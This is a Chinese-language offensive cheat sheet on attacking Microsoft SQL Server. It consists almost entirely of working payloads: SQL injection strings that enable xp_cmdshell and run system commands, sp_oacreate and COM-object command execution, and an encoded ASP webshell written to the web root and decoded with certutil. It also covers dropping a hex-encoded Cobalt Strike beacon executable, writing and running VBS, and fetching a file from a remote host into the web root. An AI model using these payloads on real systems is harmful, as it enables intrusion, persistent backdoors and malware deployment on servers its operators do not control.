MSSQL攻击面探索
xp_cmdshell
开启
id=1 ' EXEC sp_configure 'show advanced options', 1; RECONFIGURE; exec SP_CONFIGURE 'xp_cmdshell', 1; RECONFIGURE; --+
命令执行
id=1 ' exec master.dbo.xp_cmdshell 'whoami > c:/2.txt' --+
盲写结果到网站目录
盲写结果到网站目录,c:\hellomy.txt为网站特征文件,直接用这条语句到注入场景会有问题
exec master.dbo.xp_cmdshell 'for /f %i in (''dir /s /b c:\hellomy.txt'') do (whoami > %i\..\whoami.txt)'
回显结果直接插入表中
id=1' CREATE TABLE tmpTable (tmp1 varchar(8000));insert into tmpTable(tmp1) exec master..xp_cmdshell 'ipconfig';
id=1' union select 1,tmp1,null from (SELECT ROW_NUMBER () OVER (ORDER BY tmp1) AS row_number,* from tmpTable) as a where row_number=3 --
回显结果先落地再导入表中
自行修改适配SQL注入场景,前文有示例
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c ipconfig >c:\\users\\public\\111.txt'
--drop table testTable
CREATE TABLE testTable (data varchar(2000));
--把文件中的数据导入到临时表中
BULK INSERT testTable
FROM 'c:\users\public\111.txt'
WITH
(
ROWTERMINATOR ='\n'
)
--查询结果
select * from testTable;
无堆叠情况下开启xp_cmdshell并命令执行
if 1=1 execute('exec sp_configure ''show advanced options'',1;reconfigure;exec sp_configure ''xp_cmdshell'', 1;reconfigure;exec xp_cmdshell ''whoami''');
sp_oacreate
所有语句只在MSSQL客户端中使用过,可能SQL注入场景下需要自行调试
开启
exec sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;
exec sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE;
命令执行
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c whoami /all >C:\\test\test.txt'
回显,SQL注入场景下有问题
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c "for /f %i in (''dir /s /b c:\hellomy.txt'') do (whoami > %i\..\whoami.txt)"'
写Webshell
--写webshell
exec master.dbo.xp_cmdshell 'for /f %i in (''dir /s /b c:\hellomy.txt'') do (echo PCUKUmVzcG9uc2UuQ2hhclNldCA9ICJVVEYtOCIgCms9ImU0NWUzMjlmZWI1ZDkyNWIiClNlc3Npb24oImsiKT1rCnNpemU9UmVxdWVzdC5Ub3RhbEJ5dGVzCmNvbnRlbnQ9UmVxdWVzdC5CaW5hcnlSZWFkKHNpemUpCkZvciBpPTEgVG8gc2l6ZQpyZXN1bHQ9cmVzdWx0JkNocihhc2NiKG1pZGIoY29udGVudCxpLDEpKSBYb3IgQXNjKE1pZChrLChpIGFuZCAxNSkrMSwxKSkpCk5leHQKZXhlY3V0ZShyZXN1bHQpCiU+ > %i\..\bx.txt)'
--解码
exec master.dbo.xp_cmdshell 'for /f %i in (''dir /s /b c:\bx.txt'') do (certutil.exe -decode %i\..\bx.txt %i\..\1.asp)'
COM组件
命令执行
declare @ffffffff0x int,@exec int,@text int,@str varchar(8000)
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@ffffffff0x output
exec sp_oamethod @ffffffff0x,'exec',@exec output,'C:\\Windows\\System32\\cmd.exe /c whoami'
exec sp_oamethod @exec, 'StdOut', @text out
exec sp_oamethod @text, 'readall', @str out
select @str;
写Webshell
把Webshell进行HEX编码进行写入,保证不出现什么乱七八糟的字符
DECLARE @ObjectToken INT;
EXEC Sp_OACreate '{00000566-0000-0010-8000-00AA006D2EA4}',@ObjectToken OUTPUT;
EXEC Sp_OASetProperty @ObjectToken, 'Type', 1;
EXEC sp_oamethod @ObjectToken, 'Open';
EXEC sp_oamethod @ObjectToken, 'Write', NULL,0x3c250a526573706f6e73652e43686172536574203d20225554462d3822200a6b3d2265343565333239666562356439323562220a53657373696f6e28226b22293d6b0a73697a653d526571756573742e546f74616c42797465730a636f6e74656e743d526571756573742e42696e617279526561642873697a65290a466f7220693d3120546f2073697a650a726573756c743d726573756c74264368722861736362286d69646228636f6e74656e742c692c31292920586f7220417363284d6964286b2c286920616e64203135292b312c312929290a4e6578740a6578656375746528726573756c74290a253e;
EXEC sp_oamethod @ObjectToken, 'SaveToFile', NULL,'ffffffff0x.txt',2;
EXEC sp_oamethod @ObjectToken, 'Close';
EXEC sp_OADestroy @ObjectToken;
写EXE
把exe转hex
xxd -ps beacon.exe hex.txt
写入
MSSQL2005似乎出现了点问题,2008正常
DECLARE @DATA VARBINARY(MAX) = 0x...
DECLARE @filepath VARCHAR(MAX) = 'C:\\Windows\\temp\\cs.exe'
DECLARE @ObjectToken INT
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken, 'Type', 1
EXEC sp_OAMethod @ObjectToken, 'Open'
EXEC sp_OAMethod @ObjectToken, 'Write', NULL, @DATA
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, @filepath, 2
EXEC sp_OAMethod @ObjectToken, 'Close'
EXEC sp_OADestroy @ObjectToken
SELECT @filepath
写VBS并执行
-- 写VBS
declare @o int, @f int, @t int, @ret int,@a int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'createtextfile', @f out, 'c:\\www\\ffffffff0x.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 'hahahahahahhahahah'
-- 执行
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run],NULL,[c:\\www\\ffffffff0x.vbs]
复制文件
declare @ffffffff0x int;
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out;
exec sp_oamethod @ffffffff0x,'copyfile',null,'c:\\windows\\system32\calc.exe','c:\\windows\\system32\calc_copy.exe';
移动文件
declare @ffffffff0x int
exec sp_oacreate 'scripting.filesystemobject',@ffffffff0x out
exec sp_oamethod @ffffffff0x,'movefile',null,'c:\\www\\1.txt','c:\\www\\3.txt'
删除文件
declare @result int
declare @ffffffff0x int
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out
exec sp_oamethod @ffffffff0x,'deletefile',null,'c:\\www\\1.txt'
exec sp_oadestroy @ffffffff0x
远程下载文件
DECLARE @object INT, @object2 INT, @response varbinary(8000);exec Sp_OACreate 'Microsoft.XMLHTTP', @object OUTPUT;EXEC sp_OAMethod @object, 'Open', NULL, 'GET', 'http://192.168.2.107:9000/1.txt',0;EXEC sp_OAMethod @object, 'Send', NULL;EXEC sp_OAGetProperty @object, 'responseBody', @response OUTPUT;EXEC Sp_OACreate 'ADODB.Stream', @object2 OUTPUT ;EXEC sp_OASetProperty @object2, 'Type', 1;EXEC sp_OASetProperty @object2, 'Mode', 3;EXEC sp_OAMethod @object2, 'Open', NULL EXEC sp_OAMethod @object2, 'Write', NULL, @response;EXEC sp_OAMethod @object2, 'SaveToFile', NULL, 'C:\inetpub\wwwroot\1.txt', 1;
